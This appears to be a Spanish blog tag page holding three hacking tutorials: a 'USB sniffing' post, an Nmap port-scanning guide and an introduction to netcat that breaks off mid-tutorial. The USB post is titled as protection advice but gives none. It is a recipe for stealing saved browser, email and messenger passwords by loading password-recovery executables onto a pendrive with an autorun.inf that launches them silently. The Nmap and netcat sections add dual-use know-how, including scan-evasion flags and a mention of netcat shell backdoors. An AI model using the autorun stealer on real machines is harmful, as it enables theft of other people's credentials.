Tag Archives: tutorial

Como protegerse de “USB Sniffing”

Como todos sabemos muy bien los Pendrives o USB Drives los utilizamos para transferir datos y demás. ¿Alguna ves pensaron que su pendrive puede capturar todas la contraseñas y datos importantes de una computadora?. Si la respuesta es no, entonces debemos hacer algo para evitar el robo de datos importantes y contraseñas y USB Sniffing. A continuación le mostramos como un usuario cualquiera (Hacker) puede robar sus datos confidenciales.

Las personas utilizamos diferentes navegadores, diferentes programas de chat, y existe una opción en todos estos programas para “guardar contraseñas”, entonces la próxima vez que querramos acceder no tendremos que introducir la contraseña de nuevo.

Como sabemos MS Windows almacena las contraseñas, incluyendo Yahoo, Hotmail, AOL, etc, por lo que un atacante puede interceptar las contraseñas de su computadora vis USB. La siguiente herramienta puede ser utilizada para realizar esto.

  • MessPass solo se puede utilizar para recuperar contraseñas de la sección actual de usuario en el equipo local, y solo funciona si elegimos la opción “recordar contraseña” en alguno de los programas anteriores (Yahoo, AOL, Windows Messenger, Google Talk, etc). Esta aplicación no sirve para obtener contraseñas de otros usuarios.
  • MailPass es una pequeña herramienta de recuperación de contraseña, que revela las contraseñas y otros detalles de cuentas de clientes de correo electrónico (Outlook Express, Yahoo Mail, GMail Notifier, Thunderbird, etc)
  • IE PassView es una utilidad de administración de contraseñas que revela las contraseñas almacenadas por Internet Explorer (Navegador Web)
  • Protected Storage PassView es una pequeña herramienta que revela las contraseñas almacenadas en la computadora por Internet Explorer, Outlook Express y MSN Explorer.
  • PasswordFox es una pequeña utilidad de recuperación de contraseñas que nos permitirá ver los nombres de usuario y contraseñas almacenadas por el navegador Firefox

Descarga las 5 herramientas, extraerlas y copiar solo los archivos ejecutables (.exe) en el Pendrive USB.

Haz Click  Aquí para descargar un programa y ponerlo en la misma carpeta del Pendrive.

Crear un archivo de block de notas y escribir:

[autorun]

open=eh.exe

y guardarlo como autorun.inf

Ahora el USB Sniffer esta listo para usar.

Escaneo de Puertos – Tutorial Nmap

Este es uno de tantos artículos que publicaré que trataran el tema de ethical hacking/pruebas de penetración, uno de los aspectos importantes de estas actividades es el escaneo de puertos.

En este articulo hablaremos sobre los aspectos prácticos de Nmap, la forma de realizar un escaneo  rápido para saber que puertos están abiertos y que servicios corriendo en la maquina objetivo.

Nmap fue originalmente una herramienta de linea de comandos que fue desarrollada únicamente para sistemas operativos basados en UNIX/Linux pero actualmente cuenta con una versión disponible para Windows y es muy fácil de utilizar.

Podemos descargar el instalador de Nmap para Windows o desde una terminal de Linux (Linux basados en Debian) simplemente tipear:

skywalker@skywalker:~$ sudo apt-get install nmap

Ok!, ahora vamos a empezar con un escaneo simple, para obtener ayuda sobre nmap

skywalker@skywalker:~$ nmap –help

Para un escaneo  rápido y simple

skywalker@skywalker:~$ nmap 192.168.1.1

Starting Nmap 4.53 ( http://insecure.org ) at 2011-12-21 15:36 ART

Interesting ports on 192.168.1.1:

Not shown: 1710 closed ports

PORT STATE SERVICE

23/tcp open telnet

53/tcp open domain

80/tcp open http

443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 14.723 seconds

Es este un escaneo simple? Si, es un simple escaneo que le permitirá saber sobre los puertos abiertos en cualquier maquina, ahora si quiere escanear una red completa lo que tiene que tipear esto con la subred:

skywalker@skywalker:~$ nmap 192.168.1./24

o

skywalker@skywalker:~$ nmap 192.168.1.*

 

Nmap – Opciones Interesantes

  • -f fragmenta los paquetes
  • -D lanza un señuelo para ocultar los escaneos
  • -I IDENT Scan – encuentra los propietarios de los procesos (en Sistemas Unix)
  • -b FTP Bounce

Tipos de Escaneo de Puertos

  • TCP Connect scan
  • TCP SYN scan
  • TCP FIN scan
  • TCP Xmas Tree scan (FIN, URG, and PUSH)
  • TCP Null scan
  • TCP ACK scan
  • UDP scan

Nmap trabaja en los tipos de escaneos  básicos como ser:

  • TCP connect() scanning
  • TCP SYN scanning
  • TCP FIN scanning
  • Fragmentation scanning
  • TCP reverse ident scanning
  • FTP bounce attack
  • UDP ICMP port unreachable scanning
  • UDP recvfrom() and write() scanning
  • ICMP echo scanning

 

La detección del Sistema Operativo o OS fingerprinting es una parte importante de un test de penetración ya que nos permite saber sobre que sistema operativo esta corriendo el equipo objetivo, para poder lanzar un exploit apropiado para este sistema. Nmap ofrece una opción que nos permite saber que sistema operativo esta corriendo, aunque también se puede averiguar mediante el uso de la técnica de “banner grabbing”. Utilizamos -O para identificar el sistema operativo:

skywalker@skywalker:~$ nmap -O 192.168.1.5

Nota: Para utilizar OS fingerprinting se requieren privilegios “root”

Para finalizar les dejo un Cheatsheet de Nmap en Español: Descargar

Continuara….

 

 

.

Introducción y Tutorial de NetCat – Ncat

Netcat es una de las mas importante y mejores herramientas que juega un papel importante en el campo de las pruebas de seguridad IT, pentesting, o ethical hacking, también se la conoce como la “Navaja Suiza” para TCP/IP. Pero que sea para TCP/IP no quiere decir que solo pueda ser utilizada solamente para TCP, también puede ser usada para UDP. La importancia de Netcat radica en que puede ser usada con muchos propósitos.

Si como muchos profesionales de seguridad IT utilizas alguna distro de Linux como Backtrack, Gnacktrack, BackBox, Blackbuntu u otras puedes encontrar netcat en las mismas, abra una terminal y escriba “ncat” y si el mismo responde no necesitas instalarlo.

En este post voy a cubrir algunas cuestiones de uso básico y avanzado de Netcat, pero antes de empezar con el tutorial quiero explicar algunos pormenores.

Que es NetCat?

Netcat es presentada como una utilidad de networking que lee y escribe datos a través de conexiones de red, usando el protocolo TCP/IP. Unix tiene el comando “cat” y netcat ha sido diseñado para alcanzar la meta del comando cat, puedes usar netcat en diferentes sistemas operativos, el equipo de Nmap ha diseñado ncat con el concepto de netcat, por lo que en principio son la misma cosa.

Que puedes hacer con NetCat?

Esta es la pregunta mas importante y simple que uno se puede hacer acerca de esta herramienta, la respuesta es que netcat puede hacer varias cosas, pero aquí les dejo las mas importantes.

  • Banner Grabbing
  • File Transfering
  • Telnet Usage
  • Shell Backdoor

Tutorial

Puede utilizar ncat en su SO Windows  también, pero para este tutorial estoy utilizando Linux BackTrack 5 R1, así que aquí esta el tutorial desde básico hasta avanzado. El comando basico es el siguiente

# ncat <options> <hostname> <port>

El puerto por defecto para netcat es el 31337, pero ud puede usar cualquier otro puerto para conectar con el servidor, recuerden que esto es un tutorial de ncat por lo que el comando que voy a escribir es ncat en lugar de netcat. Puedes encontrar ayuda a través del siguiente comando:

# ncat -h

Si quieres saber el banner (el proceso se llama “banner grabbing”) de un software de servidor entonces utilice el comando mas simple de ncat

# ncat google.com 80

Usted seguramente se pregunte porque he utilizado el puerto 80, El puerto 80 es utilizado para HTTP, y a veces los grandes servidores utilizan firewalls o IDS (Sistema de Detección de Intrusos) entonces otro puerto podría estar cerrado.

Así que utilizando el método de “banner grabbing” se puede obtener información muy valiosa.

Puedes subir cualquier archivo a cualquier servidor o computadora cliente aquí en el comando principal sustituir la dirección IP a la dirección IP deseada:

# ncat -l 127.0.0.1 80 < test.txt